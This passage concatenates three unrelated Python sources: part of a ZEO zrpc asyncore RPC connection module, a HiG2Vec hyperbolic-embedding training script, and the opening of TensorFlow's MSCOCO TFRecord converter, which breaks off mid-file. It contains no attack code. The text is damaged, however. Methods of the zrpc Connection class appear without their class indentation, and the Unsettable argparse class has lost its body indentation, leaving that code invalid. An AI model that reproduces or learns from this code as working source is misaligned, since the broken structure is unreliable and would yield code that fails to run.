    ourmap = {}
    self.__super_init(sock, addr, map=ourmap)
    # The singleton dict is used in synchronous mode when a method
    # needs to call into asyncore to try to force some I/O to occur.
    # The singleton dict is a socket map containing only this object.
    self._singleton = {self._fileno: self}
    # waiting_for_reply is used internally to indicate whether
    # a call is in progress.  setting a session key is deferred
    # until after the call returns.
    self.waiting_for_reply = False
    self.delay_sesskey = None
    self.register_object(obj)
    # The first message we see is a protocol handshake.  message_input()
    # is temporarily replaced by recv_handshake() to treat that message
    # specially.  revc_handshake() does "del self.message_input", which
    # uncovers the normal message_input() method thereafter.
    self.message_input = self.recv_handshake
    # Server and client need to do different things for protocol
    # negotiation, and handshake() is implemented differently in each.
    self.handshake()
    # Now it's safe to register with asyncore's socket map; it was not
    # safe before message_input was replaced, or before handshake() was
    # invoked.
    # Obscure:  in Python 2.4, the base asyncore.dispatcher class grew
    # a ._map attribute, which is used instead of asyncore's global
    # socket map when ._map isn't None.  Because we passed `ourmap` to
    # the base class constructor above, in 2.4 asyncore believes we want
    # to use `ourmap` instead of the global socket map -- but we don't.
    # So we have to replace our ._map with the global socket map, and
    # update the global socket map with `ourmap`.  Replacing our ._map
    # isn't necessary before Python 2.4, but doesn't hurt then (it just
    # gives us an unused attribute in 2.3); updating the global socket
    # map is necessary regardless of Python version.
    if map is None:
        map = asyncore.socket_map
    self._map = map
    map.update(ourmap)
def __repr__(self):
    # e.g. "<ManagedClientConnection ('localhost', 8100)>"
    return "<%s %s>" % (self.__class__.__name__, self.addr)

__str__ = __repr__ # Defeat asyncore's dreaded __getattr__
def log(self, message, level=BLATHER, exc_info=False):
    """Log *message* prefixed with this connection's peer-address label."""
    self.logger.log(level, self.log_label + message, exc_info=exc_info)
def close(self):
    """Tear the connection down and wake the asyncore loop.

    Idempotent with respect to the socket teardown: the ``closed`` flag
    guards the second half.  NOTE(review): ``mgr.close_conn`` runs even
    when already closed -- presumably intentional so the manager always
    hears about the close attempt; confirm against the manager's API.
    """
    self.mgr.close_conn(self)
    if self.closed:
        return
    self._singleton.clear()
    self.closed = True
    self.__super_close()
    self.trigger.pull_trigger()
def register_object(self, obj):
    """Register obj as the true object to invoke methods on."""
    self.obj = obj
# Subclass must implement.  handshake() is called by the constructor,
# near its end, but before self is added to asyncore's socket map.
# When a connection is created the first message sent is a 4-byte
# protocol version.  This allows the protocol to evolve over time, and
# lets servers handle clients using multiple versions of the protocol.
# In general, the server's handshake() just needs to send the server's
# preferred protocol; the client's also needs to queue (delay) outgoing
# messages until it sees the handshake from the server.
def handshake(self):
    """Abstract: send/await the protocol handshake (see comment above)."""
    raise NotImplementedError
# Replaces message_input() for the first message received.  Records the
# protocol sent by the peer in `peer_protocol_version`, restores the
# normal message_input() method, and raises an exception if the peer's
# protocol is unacceptable.  That's all the server needs to do.  The
# client needs to do additional work in response to the server's
# handshake, and extends this method.
def recv_handshake(self, proto):
    """Validate the peer's protocol token against our acceptable list.

    :param proto: raw protocol bytes received from the peer.
    :raises ZRPCError: if the peer speaks a protocol we cannot accept.
    """
    # Extended by ManagedClientConnection.
    del self.message_input # uncover normal-case message_input()
    self.peer_protocol_version = proto
    if self.tag == b'C':
        good_protos = self.servers_we_can_talk_to
    else:
        assert self.tag == b'S'
        good_protos = self.clients_we_can_talk_to
    if proto in good_protos:
        self.log("received handshake %r" % proto, level=logging.INFO)
    else:
        self.log("bad handshake %s" % short_repr(proto),
                 level=logging.ERROR)
        raise ZRPCError("bad handshake %r" % proto)
def message_input(self, message):
    """Decode an incoming message and dispatch it.

    A decoded message is (msgid, async-flag, method-name, args).
    Three routes: an inlined fast path for 'loadEx' (the hottest
    server call), REPLY handling, and generic request dispatch.
    """
    # If something goes wrong during decoding, the marshaller
    # will raise an exception.  The exception will ultimately
    # result in asycnore calling handle_error(), which will
    # close the connection.
    msgid, async_, name, args = self.decode(message)
    if debug_zrpc:
        self.log("recv msg: %s, %s, %s, %s" % (msgid, async_, name,
                                               short_repr(args)),
                 level=TRACE)
    if name == 'loadEx':
        # Special case and inline the heck out of load case:
        try:
            ret = self.obj.loadEx(*args)
        except (SystemExit, KeyboardInterrupt):
            raise
        except Exception as msg:
            if not isinstance(msg, self.unlogged_exception_types):
                self.log("%s() raised exception: %s" % (name, msg),
                         logging.ERROR, exc_info=True)
            self.return_error(msgid, *sys.exc_info()[:2])
        else:
            try:
                self.message_output(self.fast_encode(msgid, 0, REPLY, ret))
                self.poll()
            except:
                # Fall back to normal version for better error handling
                self.send_reply(msgid, ret)
    elif name == REPLY:
        assert not async_
        self.handle_reply(msgid, args)
    else:
        self.handle_request(msgid, async_, name, args)
def handle_request(self, msgid, async_, name, args):
    """Invoke method *name* on the registered object and reply.

    :param msgid: message id to echo back in the reply (0 for async).
    :param async_: truthy for fire-and-forget calls -- no reply is sent
        and the method must return None.
    :param name: method name; private names (leading '_') are refused.
    :param args: positional arguments for the method.
    :raises ZRPCError: for invalid method names or an async method that
        returned a value.
    """
    obj = self.obj
    if name.startswith('_') or not hasattr(obj, name):
        if obj is None:
            if debug_zrpc:
                self.log("no object calling %s%s"
                         % (name, short_repr(args)),
                         level=logging.DEBUG)
            return
        msg = "Invalid method name: %s on %s" % (name, repr(obj))
        raise ZRPCError(msg)
    if debug_zrpc:
        self.log("calling %s%s" % (name, short_repr(args)),
                 level=logging.DEBUG)
    meth = getattr(obj, name)
    try:
        # waiting_for_reply defers setSessionKey until the reply is out
        # (see setSessionKey / the delay_sesskey handling below).
        self.waiting_for_reply = True
        try:
            ret = meth(*args)
        finally:
            self.waiting_for_reply = False
    except (SystemExit, KeyboardInterrupt):
        raise
    except Exception as msg:
        if not isinstance(msg, self.unlogged_exception_types):
            self.log("%s() raised exception: %s" % (name, msg),
                     logging.ERROR, exc_info=True)
        error = sys.exc_info()[:2]
        if async_:
            # No reply channel for async calls -- just log the failure.
            self.log("Asynchronous call raised exception: %s" % self,
                     level=logging.ERROR, exc_info=True)
        else:
            self.return_error(msgid, *error)
        return
    if async_:
        if ret is not None:
            raise ZRPCError("async method %s returned value %s" %
                            (name, short_repr(ret)))
    else:
        if debug_zrpc:
            self.log("%s returns %s" % (name, short_repr(ret)),
                     logging.DEBUG)
        if isinstance(ret, Delay):
            # Delay objects send their own reply later.
            ret.set_sender(msgid, self)
        else:
            self.send_reply(msgid, ret, not self.delay_sesskey)
    if self.delay_sesskey:
        self.__super_setSessionKey(self.delay_sesskey)
        self.delay_sesskey = None
def return_error(self, msgid, err_type, err_value):
    """Send an exception back to the peer as the reply for *msgid*."""
    # Note that, ideally, this should be defined soley for
    # servers, but a test arranges to get it called on
    # a client. Too much trouble to fix it now. :/
    if not isinstance(err_value, Exception):
        err_value = err_type, err_value
    # encode() can pass on a wide variety of exceptions from cPickle.
    # While a bare `except` is generally poor practice, in this case
    # it's acceptable -- we really do want to catch every exception
    # cPickle may raise.
    try:
        msg = self.encode(msgid, 0, REPLY, (err_type, err_value))
    except: # see above
        try:
            r = short_repr(err_value)
        except:
            r = "<unreprable>"
        err = ZRPCError("Couldn't pickle error %.100s" % r)
        msg = self.encode(msgid, 0, REPLY, (ZRPCError, err))
    self.message_output(msg)
    self.poll()
def handle_error(self):
    """asyncore error hook: log the active exception and close the connection.

    SystemExit must propagate so that an intended process shutdown is not
    swallowed by the asyncore loop.
    """
    # BUG FIX: the original did ``raise sys.exc_info()``, which raises the
    # (type, value, traceback) *tuple* itself -- a TypeError on Python 3
    # and never a SystemExit.  A bare ``raise`` re-raises the exception
    # currently being handled (handle_error is only called from inside an
    # ``except`` block in asyncore), preserving the traceback.
    if sys.exc_info()[0] == SystemExit:
        raise
    self.log("Error caught in asyncore",
             level=logging.ERROR, exc_info=True)
    self.close()
def setSessionKey(self, key):
    """Set the session key, deferring it while a call is in progress.

    The deferred key is applied by handle_request() right after the
    reply for the in-flight call has been sent.
    """
    if self.waiting_for_reply:
        self.delay_sesskey = key
    else:
        self.__super_setSessionKey(key)
def send_call(self, method, args, async_=False):
    """Encode and queue one outgoing call; return its msgid.

    Async calls all share msgid 0 since no reply is expected.
    """
    # send a message and return its msgid
    if async_:
        msgid = 0
    else:
        msgid = self._new_msgid()
    if debug_zrpc:
        self.log("send msg: %d, %d, %s, ..." % (msgid, async_, method),
                 level=TRACE)
    buf = self.encode(msgid, async_, method, args)
    self.message_output(buf)
    return msgid
def callAsync(self, method, *args):
    """Fire-and-forget remote call; polls so the bytes go out promptly.

    :raises DisconnectedError: if the connection is already closed.
    """
    if self.closed:
        raise DisconnectedError()
    self.send_call(method, args, 1)
    self.poll()
def callAsyncNoPoll(self, method, *args):
    # Like CallAsync but doesn't poll.  This exists so that we can
    # send invalidations atomically to all clients without
    # allowing any client to sneak in a load request.
    if self.closed:
        raise DisconnectedError()
    self.send_call(method, args, 1)
def callAsyncNoSend(self, method, *args):
    # Like callAsync, but wakes the asyncore loop via the trigger
    # (call_from_thread) instead of polling directly.  (The original
    # comment here was copy-pasted from callAsyncNoPoll and was
    # misleading -- this variant *does* schedule the send.)
    if self.closed:
        raise DisconnectedError()
    self.send_call(method, args, 1)
    self.call_from_thread()
def callAsyncIterator(self, iterator):
    """Queue a sequence of calls using an iterator

    The calls will not be interleaved with other calls from the same
    client.
    """
    # A generator of encoded messages is handed to message_output in one
    # shot, which is what keeps the batch contiguous on the wire.
    self.message_output(self.encode(0, 1, method, args)
                        for method, args in iterator)
def handle_reply(self, msgid, ret):
    # Base/server-side stub: the only reply a server ever sees is the
    # client heartbeat, which always has msgid == -1 and no payload.
    assert msgid == -1 and ret is None
def poll(self):
    """Invoke asyncore mainloop to get pending message out."""
    if debug_zrpc:
        self.log("poll()", level=TRACE)
    self.trigger.pull_trigger()
# import cProfile, time
class ManagedServerConnection(Connection):
    """Server-side Connection subclass."""

    # Exception types that should not be logged:
    unlogged_exception_types = (ZODB.POSException.POSKeyError, )

    def __init__(self, sock, addr, obj, mgr):
        """Create the server connection and start its private asyncore loop.

        Each server connection gets its own socket map, trigger and a
        daemon thread running server_loop() over that map.
        """
        self.mgr = mgr
        map = {}
        Connection.__init__(self, sock, addr, obj, b'S', map=map)
        self.decode = marshal.server_decode
        self.trigger = trigger.trigger(map)
        self.call_from_thread = self.trigger.pull_trigger
        t = threading.Thread(target=server_loop, args=(map,))
        t.setName("ManagedServerConnection thread")
        t.setDaemon(True)
        t.start()

    # self.profile = cProfile.Profile()

    # def message_input(self, message):
    #     self.profile.enable()
    #     try:
    #         Connection.message_input(self, message)
    #     finally:
    #         self.profile.disable()

    def handshake(self):
        # Send the server's preferred protocol to the client.
        self.message_output(self.current_protocol)

    def recv_handshake(self, proto):
        """Handle the client's handshake, plus the b'ruok' health probe.

        A b'ruok' probe gets a JSON status dump and an immediate close;
        a real handshake falls through to Connection.recv_handshake and
        then notifies the registered object that we are connected.
        """
        if proto == b'ruok':
            self.message_output(json.dumps(self.mgr.ruok()).encode("ascii"))
            self.poll()
            Connection.close(self)
        else:
            Connection.recv_handshake(self, proto)
            self.obj.notifyConnected(self)

    def close(self):
        self.obj.notifyDisconnected()
        Connection.close(self)
        # self.profile.dump_stats(str(time.time())+'.stats')

    def send_reply(self, msgid, ret, immediately=True):
        """Encode *ret* as the reply for *msgid* and queue it.

        Falls back to sending a pickled ZRPCError when the return value
        itself cannot be pickled.
        """
        # encode() can pass on a wide variety of exceptions from cPickle.
        # While a bare `except` is generally poor practice, in this case
        # it's acceptable -- we really do want to catch every exception
        # cPickle may raise.
        try:
            msg = self.encode(msgid, 0, REPLY, ret)
        except: # see above
            try:
                r = short_repr(ret)
            except:
                r = "<unreprable>"
            err = ZRPCError("Couldn't pickle return %.100s" % r)
            msg = self.encode(msgid, 0, REPLY, (ZRPCError, err))
        self.message_output(msg)
        if immediately:
            self.poll()

    # On the server, poll() flushes pending output directly rather than
    # pulling the trigger.
    poll = smac.SizedMessageAsyncConnection.handle_write
def server_loop(map):
    """Run asyncore over *map* until only the trigger itself remains.

    The map holds the connection plus its trigger; once the connection is
    removed (len(map) <= 1) the loop exits and everything left is closed.
    EBADF from a socket torn down concurrently is expected and ignored.
    """
    while len(map) > 1:
        try:
            asyncore.poll(30.0, map)
        except Exception as v:
            if v.args[0] != errno.EBADF:
                raise
    for o in tuple(map.values()):
        o.close()
class ManagedClientConnection(Connection):
    """Client-side Connection subclass."""

    __super_init = Connection.__init__
    base_message_output = Connection.message_output

    def __init__(self, sock, addr, mgr):
        self.mgr = mgr
        # We can't use the base smac's message_output directly because the
        # client needs to queue outgoing messages until it's seen the
        # initial protocol handshake from the server.  So we have our own
        # message_ouput() method, and support for initial queueing.  This is
        # a delicate design, requiring an output mutex to be wholly
        # thread-safe.
        # Caution:  we must set this up before calling the base class
        # constructor, because the latter registers us with asyncore;
        # we need to guarantee that we'll queue outgoing messages before
        # asyncore learns about us.
        self.output_lock = threading.Lock()
        self.queue_output = True
        self.queued_messages = []
        # msgid_lock guards access to msgid
        self.msgid = 0
        self.msgid_lock = threading.Lock()
        # replies_cond is used to block when a synchronous call is
        # waiting for a response
        self.replies_cond = threading.Condition()
        self.replies = {}
        self.__super_init(sock, addr, None, tag=b'C', map=mgr.map)
        self.trigger = mgr.trigger
        self.call_from_thread = self.trigger.pull_trigger
        self.call_from_thread()

    def close(self):
        # Wake every thread blocked in wait() so they can observe
        # self.closed and raise DisconnectedError.
        Connection.close(self)
        self.replies_cond.acquire()
        self.replies_cond.notifyAll()
        self.replies_cond.release()

    # Our message_ouput() queues messages until recv_handshake() gets the
    # protocol handshake from the server.
    def message_output(self, message):
        self.output_lock.acquire()
        try:
            if self.queue_output:
                self.queued_messages.append(message)
            else:
                assert not self.queued_messages
                self.base_message_output(message)
        finally:
            self.output_lock.release()

    def handshake(self):
        # The client waits to see the server's handshake.  Outgoing messages
        # are queued for the duration.  The client will send its own
        # handshake after the server's handshake is seen, in recv_handshake()
        # below.  It will then send any messages queued while waiting.
        assert self.queue_output # the constructor already set this

    def recv_handshake(self, proto):
        # The protocol to use is the older of our and the server's preferred
        # protocols.
        proto = min(proto, self.current_protocol)
        # Restore the normal message_input method, and raise an exception
        # if the protocol version is too old.
        Connection.recv_handshake(self, proto)
        # Tell the server the protocol in use, then send any messages that
        # were queued while waiting to hear the server's protocol, and stop
        # queueing messages.
        self.output_lock.acquire()
        try:
            self.base_message_output(proto)
            for message in self.queued_messages:
                self.base_message_output(message)
            self.queued_messages = []
            self.queue_output = False
        finally:
            self.output_lock.release()

    def _new_msgid(self):
        """Return a fresh message id (thread-safe monotonic counter)."""
        self.msgid_lock.acquire()
        try:
            msgid = self.msgid
            self.msgid = self.msgid + 1
            return msgid
        finally:
            self.msgid_lock.release()

    def call(self, method, *args):
        """Synchronous remote call: send, block for the reply, return it.

        A reply of (ExceptionClass, instance, ...) is re-raised locally.
        :raises DisconnectedError: if the connection is closed.
        """
        if self.closed:
            raise DisconnectedError()
        msgid = self.send_call(method, args)
        r_args = self.wait(msgid)
        if (isinstance(r_args, tuple) and len(r_args) > 1
                and type(r_args[0]) == exception_type_type
                and issubclass(r_args[0], Exception)):
            inst = r_args[1]
            raise inst # error raised by server
        else:
            return r_args

    def wait(self, msgid):
        """Invoke asyncore mainloop and wait for reply."""
        if debug_zrpc:
            self.log("wait(%d)" % msgid, level=TRACE)
        self.trigger.pull_trigger()
        self.replies_cond.acquire()
        try:
            while 1:
                if self.closed:
                    raise DisconnectedError()
                # `self` doubles as the "missing" sentinel so that None
                # remains a valid reply value.
                reply = self.replies.get(msgid, self)
                if reply is not self:
                    del self.replies[msgid]
                    if debug_zrpc:
                        self.log("wait(%d): reply=%s" %
                                 (msgid, short_repr(reply)), level=TRACE)
                    return reply
                self.replies_cond.wait()
        finally:
            self.replies_cond.release()

    # For testing purposes, it is useful to begin a synchronous call
    # but not block waiting for its response.
    def _deferred_call(self, method, *args):
        if self.closed:
            raise DisconnectedError()
        msgid = self.send_call(method, args)
        self.trigger.pull_trigger()
        return msgid

    def _deferred_wait(self, msgid):
        r_args = self.wait(msgid)
        if (isinstance(r_args, tuple)
                and type(r_args[0]) == exception_type_type
                and issubclass(r_args[0], Exception)):
            inst = r_args[1]
            raise inst # error raised by server
        else:
            return r_args

    def handle_reply(self, msgid, args):
        """Record an incoming reply and wake any thread blocked in wait()."""
        if debug_zrpc:
            self.log("recv reply: %s, %s"
                     % (msgid, short_repr(args)), level=TRACE)
        self.replies_cond.acquire()
        try:
            self.replies[msgid] = args
            self.replies_cond.notifyAll()
        finally:
            self.replies_cond.release()

    def send_reply(self, msgid, ret):
        # Whimper.  Used to send heartbeat
        assert msgid == -1 and ret is None
        self.message_output(b'(J\xff\xff\xff\xffK\x00U\x06.replyNt.')
|
embedGO.py | #!/usr/bin/env python3
# The original source code of Poincare Embedding can be found in https://github.com/facebookresearch/poincare-embeddings
# This source code is partially modified for the application to HiG2Vec.
import torch as th
import numpy as np
import logging
import argparse
from hype.sn import Embedding, initialize
from hype import trainGO
from hype.graph import load_edge_list, eval_reconstruction
from hype.checkpoint import LocalCheckpoint
from hype.rsgd import RiemannianSGD
from hype.lorentz import LorentzManifold
from hype.euclidean import EuclideanManifold
from hype.poincare import PoincareManifold
import sys
import json
import torch.multiprocessing as mp
import shutil
import time
# Fix the RNG seeds so embedding runs are reproducible.
th.manual_seed(42)
np.random.seed(42)

# Registry mapping the -manifold CLI choice to its manifold class.
MANIFOLDS = {
    'lorentz': LorentzManifold,
    'euclidean': EuclideanManifold,
    'poincare': PoincareManifold
}
def async_eval(adj, q, logQ, opt):
    """Checkpoint-evaluation worker run in a separate process.

    Pulls (epoch, elapsed, loss, checkpoint_path) tuples from ``q`` until a
    ``None`` sentinel arrives, loads each checkpoint's embeddings on CPU,
    computes embedding-norm statistics and pushes (log_message, path) onto
    ``logQ`` for the main process to consume.

    :param adj: adjacency dict built in main().  NOTE(review): not read in
        this function body -- presumably kept for a reconstruction-eval
        variant; confirm before removing.
    :param q: work queue of checkpoint tuples (None terminates).
    :param logQ: queue of (stats-dict, checkpoint-path) results.
    :param opt: parsed CLI options (only opt.manifold is used here).
    """
    manifold = MANIFOLDS[opt.manifold]()
    while True:
        temp = q.get()
        if temp is None:
            return
        # Skip stale checkpoints: only evaluate the newest queued one.
        if not q.empty():
            continue
        epoch, elapsed, loss, pth = temp
        chkpnt = th.load(pth, map_location='cpu')
        lt = chkpnt['embeddings']
        sqnorms = manifold.pnorm(lt)
        # if manifold.pnorm() doesn't work,
        # sqnorms = np.sqrt(np.sum(lt.numpy()*lt.numpy(),axis=1))
        lmsg = {
            'epoch': epoch,
            'elapsed': elapsed,
            'loss': loss,
            'sqnorm_min': sqnorms.min().item(),
            'sqnorm_avg': sqnorms.mean().item(),
            'sqnorm_max': sqnorms.max().item()
        }
        logQ.put((lmsg, pth))
# Adapated from:
# https://thisdataguy.com/2017/07/03/no-options-with-argparse-and-python/
class Unsettable(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(Unsettable, self).__init__(option_strings, dest, nargs='?', **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
val = None if option_string.startswith('-no') else values
setattr(namespace, self.dest, val)
def main():
    """CLI entry point: train hyperbolic GO embeddings with checkpointing.

    Parses options, builds the dataset/model/optimizer, spawns an async
    checkpoint-evaluation process, then trains either single-threaded or
    Hogwild-style across processes.
    """
    parser = argparse.ArgumentParser(description='Train Hyperbolic Embeddings')
    parser.add_argument('-checkpoint', default='/result/HiG2Vec_GOonly.pth',
                        help='Where to store the model checkpoint')
    parser.add_argument('-dset', type=str, required=True,
                        help='Dataset identifier')
    parser.add_argument('-dim', type=int, default=1000,
                        help='Embedding dimension')
    parser.add_argument('-manifold', type=str, default='poincare',
                        choices=MANIFOLDS.keys(), help='Embedding manifold')
    parser.add_argument('-lr', type=float, default=0.3,
                        help='Learning rate')
    parser.add_argument('-epochs', type=int, default=1000,
                        help='Number of epochs')
    parser.add_argument('-batchsize', type=int, default=50,
                        help='Batchsize')
    parser.add_argument('-negs', type=int, default=50,
                        help='Number of negatives')
    parser.add_argument('-burnin', type=int, default=20,
                        help='Epochs of burn in')
    parser.add_argument('-dampening', type=float, default=0.75,
                        help='Sample dampening during burnin')
    parser.add_argument('-ndproc', type=int, default=4,
                        help='Number of data loading processes')
    parser.add_argument('-eval_each', type=int, default=1,
                        help='Run evaluation every n-th epoch')
    parser.add_argument('-fresh', action='store_true', default=False,
                        help='Override checkpoint')
    parser.add_argument('-debug', action='store_true', default=False,
                        help='Print debuggin output')
    parser.add_argument('-gpu', default=0, type=int,
                        help='Which GPU to run on (-1 for no gpu)')
    parser.add_argument('-sym', action='store_true', default=False,
                        help='Symmetrize dataset')
    parser.add_argument('-maxnorm', '-no-maxnorm', default='1',
                        action=Unsettable, type=int)
    parser.add_argument('-sparse', default=False, action='store_true',
                        help='Use sparse gradients for embedding table')
    parser.add_argument('-burnin_multiplier', default=0.01, type=float)
    parser.add_argument('-neg_multiplier', default=1.0, type=float)
    parser.add_argument('-quiet', action='store_true', default=False)
    parser.add_argument('-lr_type', choices=['scale', 'constant'], default='constant')
    parser.add_argument('-train_threads', type=int, default=1,
                        help='Number of threads to use in training when using CPU')
    opt = parser.parse_args()

    # setup debugging and logigng
    log_level = logging.DEBUG if opt.debug else logging.INFO
    log = logging.getLogger('lorentz')
    logging.basicConfig(level=log_level, format='%(message)s', stream=sys.stdout)

    # Hogwild multi-process training only makes sense on CPU.
    if opt.gpu >= 0 and opt.train_threads > 1:
        opt.gpu = -1
        log.warning(f'Specified hogwild training with GPU, defaulting to CPU...')

    # set default tensor type
    th.set_default_tensor_type('torch.DoubleTensor')
    # set device
    device = th.device(f'cuda:{opt.gpu}' if th.cuda.is_available() and opt.gpu >=0 else 'cpu')

    # select manifold to optimize on
    manifold = MANIFOLDS[opt.manifold](debug=opt.debug, max_norm=opt.maxnorm)
    opt.dim = manifold.dim(opt.dim)

    if 'tsv' in opt.dset:
        log.info('Using edge list dataloader')
        idx, objects, weights = load_edge_list(opt.dset, opt.sym)
        model, data, model_name, conf = initialize(
            manifold, opt, idx, objects, weights, sparse=opt.sparse
        )
    else:
        # NOTE(review): this branch only logs -- `model`/`data`/`objects`
        # remain unbound and the code below would raise NameError.
        # Presumably only .tsv inputs are supported; confirm.
        log.info("Not adaptive format")

    # set burnin parameters
    data.neg_multiplier = opt.neg_multiplier
    trainGO._lr_multiplier = opt.burnin_multiplier

    # Build config string for log
    log.info(f'json_conf: {json.dumps(vars(opt))}')

    if opt.lr_type == 'scale':
        opt.lr = opt.lr * opt.batchsize

    # setup optimizer
    optimizer = RiemannianSGD(model.optim_params(manifold), lr=opt.lr)

    # setup checkpoint
    checkpoint = LocalCheckpoint(
        opt.checkpoint,
        include_in_all={'conf' : vars(opt), 'objects' : objects},
        start_fresh=opt.fresh
    )

    # get state from checkpoint
    state = checkpoint.initialize({'epoch': 0, 'model': model.state_dict()})
    model.load_state_dict(state['model'])
    opt.epoch_start = state['epoch']

    # Build the adjacency map (node -> set of neighbours) consumed by the
    # evaluation process.
    adj = {}
    for inputs, _ in data:
        for row in inputs:
            x = row[0].item()
            y = row[1].item()
            if x in adj:
                adj[x].add(y)
            else:
                adj[x] = {y}

    controlQ, logQ = mp.Queue(), mp.Queue()
    control_thread = mp.Process(target=async_eval, args=(adj, controlQ, logQ, opt))
    control_thread.start()

    # control closure
    def control(model, epoch, elapsed, loss):
        """
        Control thread to evaluate embedding
        """
        lt = model.w_avg if hasattr(model, 'w_avg') else model.lt.weight.data
        manifold.normalize(lt)

        checkpoint.path = f'{opt.checkpoint}.{epoch}'
        checkpoint.save({
            'model': model.state_dict(),
            'embeddings': lt,
            'epoch': epoch,
            'manifold': opt.manifold,
        })
        controlQ.put((epoch, elapsed, loss, checkpoint.path))

        # Drain results produced so far; the per-epoch checkpoint is
        # promoted to the main checkpoint path.
        while not logQ.empty():
            lmsg, pth = logQ.get()
            shutil.move(pth, opt.checkpoint)
            log.info(f'json_stats: {json.dumps(lmsg)}')

    control.checkpoint = True
    model = model.to(device)
    if hasattr(model, 'w_avg'):
        model.w_avg = model.w_avg.to(device)
    if opt.train_threads > 1:
        threads = []
        model = model.share_memory()
        args = (device, model, data, optimizer, opt, log)
        kwargs = {'ctrl': control, 'progress' : not opt.quiet}
        for i in range(opt.train_threads):
            kwargs['rank'] = i
            threads.append(mp.Process(target=trainGO.train, args=args, kwargs=kwargs))
            threads[-1].start()
        [t.join() for t in threads]
    else:
        trainGO.train(device, model, data, optimizer, opt, log, ctrl=control,
                      progress=not opt.quiet)

    # Signal the evaluation process to exit, then flush remaining results.
    controlQ.put(None)
    control_thread.join()
    while not logQ.empty():
        lmsg, pth = logQ.get()
        shutil.move(pth, opt.checkpoint)
        log.info(f'json_stats: {json.dumps(lmsg)}')


if __name__ == '__main__':
    start_time = time.time()
    main()
    print("--- %s seconds ---" % (time.time() - start_time))
|
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
# Command-line flags: input/output locations, shard counts, and the
# vocabulary-construction parameters.
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
                       "Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
                       "Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
                       "Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
                       "Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
                        "Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
                        "Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
                        "Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
                       "Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
                       "Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
                       "Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
                        "The minimum number of occurrences of each word in the "
                        "training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
                       "Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
                        "Number of threads to preprocess the images.")

FLAGS = tf.flags.FLAGS

# Lightweight record tying an MSCOCO image id and filename to its captions.
ImageMetadata = namedtuple("ImageMetadata",
                           ["image_id", "filename", "captions"])
class Vocabulary(object):
    """Simple vocabulary wrapper."""

    def __init__(self, vocab, unk_id):
        """Initializes the vocabulary.

        Args:
          vocab: A dictionary of word to word_id.
          unk_id: Id of the special 'unknown' word.
        """
        self._vocab = vocab
        self._unk_id = unk_id

    def word_to_id(self, word):
        """Returns the integer id of a word string."""
        # dict.get folds the membership test and lookup into one step;
        # unknown words map to the reserved unk id.
        return self._vocab.get(word, self._unk_id)
class ImageDecoder(object):
    """Helper class for decoding images in TensorFlow."""

    def __init__(self):
        # Create a single TensorFlow Session for all image decoding calls.
        self._sess = tf.Session()
        # TensorFlow ops for JPEG decoding.
        self._encoded_jpeg = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)

    def decode_jpeg(self, encoded_jpeg):
        """Decode JPEG bytes; returns an HxWx3 array or raises on bad data."""
        image = self._sess.run(self._decode_jpeg,
                               feed_dict={self._encoded_jpeg: encoded_jpeg})
        # Sanity-check that decoding produced a 3-channel image.
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _int64_feature(value):
